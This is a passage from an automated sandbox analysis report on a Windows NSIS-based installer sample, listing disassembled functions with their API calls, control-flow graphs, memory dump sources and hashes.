                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,?), ref: 00403946
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403966
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(00438800,00420EC8,00000001), ref: 004039D8
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32(?), ref: 00403A23
                                                                                                                                                                                                                                      • OleUninitialize.OLE32(?), ref: 00403A28
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403A42
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
                                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
                                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AB5
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403AD6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                                                                                                                                      • String ID: .tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                                      • API String ID: 2292928366-4051844609
                                                                                                                                                                                                                                      • Opcode ID: 6a201c649498f46d561448cca06b00f6a05d6c8263ed9975ecbcae0aa3d607cd
                                                                                                                                                                                                                                      • Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a201c649498f46d561448cca06b00f6a05d6c8263ed9975ecbcae0aa3d607cd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 141 4056a8-4056c3 142 405852-405859 141->142 143 4056c9-405790 GetDlgItem * 3 call 404498 call 404df1 GetClientRect GetSystemMetrics SendMessageW * 2 141->143 145 405883-405890 142->145 146 40585b-40587d GetDlgItem CreateThread FindCloseChangeNotification 142->146 163 405792-4057ac SendMessageW * 2 143->163 164 4057ae-4057b1 143->164 148 405892-405898 145->148 149 4058ae-4058b8 145->149 146->145 151 4058d3-4058dc call 4044ca 148->151 152 40589a-4058a9 ShowWindow * 2 call 404498 148->152 153 4058ba-4058c0 149->153 154 40590e-405912 149->154 167 4058e1-4058e5 151->167 152->149 158 4058c2-4058ce call 40443c 153->158 159 4058e8-4058f8 ShowWindow 153->159 154->151 156 405914-40591a 154->156 156->151 165 40591c-40592f SendMessageW 156->165 158->151 161 405908-405909 call 40443c 159->161 162 4058fa-405903 call 405569 159->162 161->154 162->161 163->164 170 4057c1-4057d8 call 404463 164->170 171 4057b3-4057bf SendMessageW 164->171 172 405a31-405a33 165->172 173 405935-405960 CreatePopupMenu call 406544 AppendMenuW 165->173 180 4057da-4057ee ShowWindow 170->180 181 40580e-40582f GetDlgItem SendMessageW 170->181 171->170 172->167 178 405962-405972 GetWindowRect 173->178 179 405975-40598a TrackPopupMenu 173->179 178->179 179->172 183 405990-4059a7 179->183 184 4057f0-4057fb ShowWindow 180->184 185 4057fd 180->185 181->172 182 405835-40584d SendMessageW * 2 181->182 182->172 186 4059ac-4059c7 SendMessageW 183->186 187 405803-405809 call 404498 184->187 185->187 186->186 189 4059c9-4059ec OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 186->189 187->181 190 4059ee-405a15 SendMessageW 189->190 190->190 191 405a17-405a2b GlobalUnlock SetClipboardData CloseClipboard 190->191 191->172
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405706
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405715
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00405752
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405759
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 004057F5
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405816
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405724
                                                                                                                                                                                                                                        • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405868
                                                                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_0000563C,00000000), ref: 00405876
                                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040587D
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 004058A1
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 004058A6
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000008), ref: 004058F0
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00405935
                                                                                                                                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405949
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00405969
                                                                                                                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
                                                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 004059CA
                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 004059D0
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004059E6
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
                                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405A25
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00405A2B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                      • String ID: {
                                                                                                                                                                                                                                      • API String ID: 4154960007-366298937
                                                                                                                                                                                                                                      • Opcode ID: b1b6d11e03e474fe05ed43e1ab8ee8a1b6ba8e9c1710d92ba4998ff04e9fb9cd
                                                                                                                                                                                                                                      • Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1b6d11e03e474fe05ed43e1ab8ee8a1b6ba8e9c1710d92ba4998ff04e9fb9cd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 654 406bfe-406c03 655 406c74-406c92 654->655 656 406c05-406c34 654->656 657 40726a-40727f 655->657 658 406c36-406c39 656->658 659 406c3b-406c3f 656->659 663 407281-407297 657->663 664 407299-4072af 657->664 660 406c4b-406c4e 658->660 661 406c41-406c45 659->661 662 406c47 659->662 665 406c50-406c59 660->665 666 406c6c-406c6f 660->666 661->660 662->660 667 4072b2-4072b9 663->667 664->667 670 406c5b 665->670 671 406c5e-406c6a 665->671 672 406e41-406e5f 666->672 668 4072e0-4072ec 667->668 669 4072bb-4072bf 667->669 680 406a82-406a8b 668->680 673 4072c5-4072dd 669->673 674 40746e-407478 669->674 670->671 678 406cd4-406d02 671->678 676 406e61-406e75 672->676 677 406e77-406e89 672->677 673->668 679 407484-407497 674->679 683 406e8c-406e96 676->683 677->683 681 406d04-406d1c 678->681 682 406d1e-406d38 678->682 684 40749c-4074a0 679->684 688 406a91 680->688 689 407499 680->689 685 406d3b-406d45 681->685 682->685 686 406e98 683->686 687 406e39-406e3f 683->687 691 406d4b 685->691 692 406cbc-406cc2 685->692 693 406e14-406e18 686->693 694 406fa9-406fb6 686->694 687->672 690 406ddd-406de7 687->690 695 406a98-406a9c 688->695 696 406bd8-406bf9 688->696 697 406b3d-406b41 688->697 698 406bad-406bb1 688->698 689->684 701 40742c-407436 690->701 702 406ded-406e0f 690->702 712 406ca1-406cb9 691->712 713 407408-407412 691->713 703 406d75-406d7b 692->703 704 406cc8-406cce 692->704 705 407420-40742a 693->705 706 406e1e-406e36 693->706 694->680 695->679 710 406aa2-406aaf 695->710 696->657 708 406b47-406b60 697->708 709 4073ed-4073f7 697->709 699 406bb7-406bcb 698->699 700 4073fc-407406 698->700 714 406bce-406bd6 699->714 700->679 701->679 702->694 715 406dd9 703->715 717 406d7d-406d9b 703->717 704->678 704->715 705->679 706->687 716 406b63-406b67 708->716 709->679 710->689 711 406ab5-406afb 710->711 718 406b23-406b25 711->718 719 406afd-406b01 711->719 712->692 713->679 714->696 714->698 715->690 716->697 720 406b69-406b6f 716->720 721 406db3-406dc5 717->721 722 406d9d-406db1 717->722 725 406b33-406b3b 718->725 726 406b27-406b31 718->726 723 406b03-406b06 GlobalFree 719->723 724 406b0c-406b1a GlobalAlloc 719->724 727 406b71-406b78 720->727 728 406b99-406bab 720->728 729 406dc8-406dd2 721->729 722->729 723->724 724->689 731 406b20 724->731 725->716 726->725 726->726 732 406b83-406b93 GlobalAlloc 727->732 733 406b7a-406b7d GlobalFree 727->733 728->714 729->703 730 406dd4 729->730 735 407414-40741e 730->735 736 406d5a-406d72 730->736 731->718 732->689 732->728 733->732 735->679 736->703
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                                                                                                                                                                                                                      • Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 774 40683d-406851 FindFirstFileW 775 406853-40685c FindClose 774->775 776 40685e 774->776 777 406860-406861 775->777 776->777
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 00406848
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00406854
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                      • String ID: XgB
                                                                                                                                                                                                                                      • API String ID: 2295610775-796949446
                                                                                                                                                                                                                                      • Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                                                                                                                                                                                      • Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 192 403f64-403f76 193 403f7c-403f82 192->193 194 4040dd-4040ec 192->194 193->194 195 403f88-403f91 193->195 196 40413b-404150 194->196 197 4040ee-404136 GetDlgItem * 2 call 404463 SetClassLongW call 40140b 194->197 198 403f93-403fa0 SetWindowPos 195->198 199 403fa6-403fad 195->199 201 404190-404195 call 4044af 196->201 202 404152-404155 196->202 197->196 198->199 204 403ff1-403ff7 199->204 205 403faf-403fc9 ShowWindow 199->205 210 40419a-4041b5 201->210 207 404157-404162 call 401389 202->207 208 404188-40418a 202->208 213 404010-404013 204->213 214 403ff9-40400b DestroyWindow 204->214 211 4040ca-4040d8 call 4044ca 205->211 212 403fcf-403fe2 GetWindowLongW 205->212 207->208 227 404164-404183 SendMessageW 207->227 208->201 209 404430 208->209 222 404432-404439 209->222 219 4041b7-4041b9 call 40140b 210->219 220 4041be-4041c4 210->220 211->222 212->211 221 403fe8-403feb ShowWindow 212->221 225 404015-404021 SetWindowLongW 213->225 226 404026-40402c 213->226 223 40440d-404413 214->223 219->220 231 4041ca-4041d5 220->231 232 4043ee-404407 DestroyWindow KiUserCallbackDispatcher 220->232 221->204 223->209 230 404415-40441b 223->230 225->222 226->211 233 404032-404041 GetDlgItem 226->233 227->222 230->209 234 40441d-404426 ShowWindow 230->234 231->232 235 4041db-404228 call 406544 call 404463 * 3 GetDlgItem 231->235 232->223 236 404060-404063 233->236 237 404043-40405a SendMessageW IsWindowEnabled 233->237 234->209 264 404232-40426e ShowWindow KiUserCallbackDispatcher call 404485 EnableWindow 235->264 265 40422a-40422f 235->265 238 404065-404066 236->238 239 404068-40406b 236->239 237->209 237->236 241 404096-40409b call 40443c 238->241 242 404079-40407e 239->242 243 40406d-404073 239->243 241->211 245 4040b4-4040c4 SendMessageW 242->245 247 404080-404086 242->247 243->245 246 404075-404077 243->246 245->211 246->241 250 404088-40408e call 40140b 247->250 251 40409d-4040a6 call 40140b 247->251 262 404094 250->262 251->211 260 4040a8-4040b2 251->260 260->262 262->241 268 404270-404271 264->268 269 404273 264->269 265->264 270 404275-4042a3 GetSystemMenu EnableMenuItem SendMessageW 268->270 269->270 271 4042a5-4042b6 SendMessageW 270->271 272 4042b8 270->272 273 4042be-4042fd call 404498 call 403f45 call 406507 lstrlenW call 406544 SetWindowTextW call 401389 271->273 272->273 273->210 284 404303-404305 273->284 284->210 285 40430b-40430f 284->285 286 404311-404317 285->286 287 40432e-404342 DestroyWindow 285->287 286->209 288 40431d-404323 286->288 287->223 289 404348-404375 CreateDialogParamW 287->289 288->210 290 404329 288->290 289->223 291 40437b-4043d2 call 404463 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 289->291 290->209 291->209 296 4043d4-4043e7 ShowWindow call 4044af 291->296 298 4043ec 296->298 298->223
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00403FC0
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000004), ref: 00403FEB
                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00403FFF
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404018
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00404037
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00404052
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004040FD
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00404107
                                                                                                                                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00404121
                                                                                                                                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00404218
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00404239
                                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040424B
                                                                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00404266
                                                                                                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
                                                                                                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 00404283
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00423708), ref: 004042EC
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404420
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 121052019-0
                                                                                                                                                                                                                                      • Opcode ID: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
                                                                                                                                                                                                                                      • Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
